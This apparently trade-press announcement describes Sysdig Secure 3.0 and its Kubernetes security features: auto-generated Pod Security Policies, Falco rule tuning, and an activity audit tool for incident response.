Sysdig has announced Sysdig Secure 3.0 industry’s first tool to provide enterprises with threat prevention at runtime using Kubernetes-native Pod Security Policies (PSP). This launch also includes the first incident response and audit tool specific to Kubernetes environments.
Sysdig Secure embeds security and compliance into the build, run and respond stages of the Kubernetes lifecycle. With Sysdig, enterprises can embed security, maximize availability, and validate compliance. Sysdig Secure integrates into your secure DevOps workflow, giving you the confidence to run Kubernetes in production.
This release has three main features:
Kubernetes Policy Advisor prevents threats at runtime using Kubernetes Pod Security Policies.
Falco Tuning optimizes Falco rules to reduce false positives and alert fatigue.
Activity Audit speeds incident response and enables audit by correlating container and Kubernetes activity.
As DevOps teams ramp Kubernetes in production, their responsibilities expand beyond monitoring, capacity management and troubleshooting to include security and compliance. Teams are looking to merge these two functions into a single secure DevOps workflow. The new features of Secure 3.0 streamline security responsibilities for DevOps teams, so they can focus on maximizing availability of their Kubernetes platform.
Kubernetes Pod Security Policies provide a framework to ensure that Pods run with appropriate privileges and can only access the required resources.
Kubernetes Policy Advisor creates a three step workflow to easily implement PSPs:
Generate: Sysdig Secure auto-generates a restrictive PSP from the pod specs in the deployment definition of a yaml file. This process allows you to significantly decrease the time spent configuring security policies.
Validate: Policy Advisor validates the policies prior to enforcement to ensure they do not break application functionality. Comparing the PSP against the application runtime behavior, teams can tweak the policy to be more or less permissive. This iterative process gives confidence in the expected pod behavior in production.
Prevent: Sysdig leverages Kubernetes-native controls to handle enforcement. This streamlined approach doesn’t tamper with the container infrastructure and has no performance impact.
Activity Audit is the first Kubernetes-native tool for incident response
Without the ability to map system, activity to users or services, security teams have no way to uncover malicious behavior and misconfigurations within Kubernetes.
Sysdig’s Activity Audit speeds incident response and enables audit for Kubernetes. Sysdig captures relevant information like:
executed commands inside the container
Kubernetes API events like users executing kubectl exec
By correlating this information with Kubernetes application context, the SOC team can spot abnormal activity. For example, they can review a kubectl exec into a pod in Kubernetes and trace the chain of activity.
(Image Courtesy: www. auth0.com)